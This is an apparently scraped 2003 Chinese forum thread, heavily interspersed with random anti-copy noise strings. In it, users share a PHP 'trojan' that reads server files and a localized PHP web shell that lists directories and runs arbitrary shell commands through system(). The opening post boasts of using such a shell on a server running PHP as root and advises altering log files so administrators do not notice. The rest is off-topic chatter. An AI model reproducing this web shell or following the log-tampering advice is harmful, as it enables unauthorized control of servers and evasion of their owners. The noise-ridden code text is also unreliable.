我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 xx.php如下（太简陋了，不免高手门笑话，hoho） / v' V3 u, j3 \0 g' ]# A% m//获得指定文件的文本 & Z+ ]5 O+ j8 t; L3 h# Lfunction getfile($filename) { if (!$filename){ return false; : h7 z! ~+ d3 M } $fp = @fopen($filename,"r"); 8 T) H/ }. D1 Q % J/ J W0 ~) Z" B7 x/ ?( Y if (!$fp){ 3 U6 g* x- V5 r' g1 x8 ^3 L6 ` return false; 6 p: A% T8 Z% H! y m% k } / c: }5 \; i: N( Q+ i $fdata = @fread($fp,filesize($filename)); fclose($fp); return $fdata; } ! l, d# h1 N' G, I2 V4 l $str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 4 O" i/ _4 H+ j' J但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 /* GNU */ . q5 R6 E* d! C/ K9 n' H) A# ~# Z/* 您可以任意传播，不过请一定写出作者名字 */ : L' t8 R, U9 c- V1 k3 F1 O8 U/* 原作者： Martin Geisler 改写汉化： YZHLINUX $ U9 {, ]& b5 Q& }*/ ( C/ f0 D" r: s! B$ m Y) J3 i+ X. |) S/ G # ~( V# b8 E! w* d; @ 8 k- J& R: N5 T9 v7 X. r% C9 q# L# K1 }+ E/ ^- E /* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ if (isset($work_dir)) { # T/ \9 x0 A/ K4 ~; @ /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 ' |' w4 s, X; a ^! y} else { " j3 ~% J# e! A9 R/ b8 w' Q$ [ /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 注: $DOCUMENT_ROOT 是系统提供的*/ chdir($DOCUMENT_ROOT); * ~% n0 Z% f5 P* H/ |6 l2 m $work_dir = $DOCUMENT_ROOT; , R! v$ \- w# f1 ^+ |/ w/ O} ?>

( r8 a' j$ b3 U/ ~/ p6 S

当前工作目录: # B# E0 [5 ?5 S1 I9 N l7 p' a; M$ H$work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ 1 L3 v# T8 }" x$ X# L; w} else { for ($i = 0; $i < count($work_dir_splitted); $i++) { % _8 p$ j2 i- S8 p- p3 Q- z /* echo "i = $i";*/ 9 M# ?0 }0 u9 U; ]& ^ $url .= "/".$work_dir_splitted[$i]; ) [' ^, S/ v5 l& @6 } @ echo "$work_dir_splitted[$i]/"; 2 D4 j( G' ~, E6 N! K } } ?>

) p: g6 w) x' o2 ]3 l

选择新的工作目录:

; S! T1 H3 r+ t) _0 Y* S 1 g1 s l' t j: t' J3 l3 a( N/* 现在我们对这个目录坐一个文件列表 */ ; v& q: _) f" f* ?$dir_handle = opendir($work_dir); + F. ?% S( h$ v( x/* 来一个遍历找出所有的文件和目录 */ 8 |: A6 K3 q7 H' i' Awhile ($dir = readdir($dir_handle)) { if (is_dir($dir)) { if ($dir == ".") { echo "Current Directory\n"; 0 b4 a3 Z/ L: x; w } elseif ($dir == "..") { ) I5 ~& ^2 ]0 \* d0 H9 f /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { /* 长度只有 1 ---- 那么只能是 '/' 了 */ ! _ R% ~0 O/ |# `/ U- { } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ echo "Parent Directory\n"; 9 q$ d1 {% i/ S: [% B } else { 9 \( ]7 D1 d5 i& i echo "Parent Directory\n"; } - u3 w6 a) r: t* H! O8 e- y } else { 8 m# z. ?4 C! l' i. q9 O* M; T$ Q. V if ($work_dir == "/") { . r" {7 Z0 w/ x* r echo "$dir\n"; + L5 G0 ]" f+ X1 V2 D' O } else { $ b" [9 h( W: E, o- ? echo "$dir\n"; } , E8 U/ f T: L+ z/ y+ E } } - r* D6 n# j" j# l} closedir($dir_handle);//不要忘记关闭 ?> ' _6 |- w" N; p7 \8 K9 T( ]7 K - q! N5 n5 C5 _# F+ F- [" c" {

命令:

' ?- D) s* Y6 @+ E' G/ u8 _ >

. L4 N- k# E' o& V

是否捕获错误信息?

" ?: c" I6 [! N& M

Output:

<font class="jammer">6 }% [5 x- N, C, z2 K</font> <?php <span style="display:none">$ I8 f, u9 C3 ] B</span>if ($command) { <span style="display:none">$ x2 I) P: S3 H9 Y* O. w</span> if ($stderr) { <span style="display:none">1 d: T) o. x1 v1 |</span> /* 这个命令组能看懂吗? <font class="jammer">; i& ?9 m7 e0 V" f) R$ [* u4 S</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/<font class="jammer">- j7 g4 B, p( Z1 i</font> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");<font class="jammer">, Y8 f* x: V3 R0 g8 c</font> }else { <span style="display:none">$ F& u( ?& @' Y( r/ ~% r, i) s</span> system($command);<font class="jammer">- f3 s% v9 x. I0 C8 M" U+ G</font> }<font class="jammer">2 {: O& H& q2 Y; h8 S</font> }<font class="jammer">" _0 A3 G; |# w# k0 a- Y' G4 v W! ?4 K</font> ?> <span style="display:none">! ^. F* g3 V/ |6 C: j</span>

: @) K+ R% R( o% w) k ! y7 J+ w+ [( [. ^; m* E

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
, j* a6 k$ K6 m9 r是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（
& a' g9 }, D! ^3 F# R+ Q

我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
$ }( \$ v$ M1 N/ b$ k: I想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！
. V5 ~7 o+ F5 y8 q

yzhlounx 你是工程的吧  呵呵
+ l3 e+ K* a& W/ {6 B8 h$ G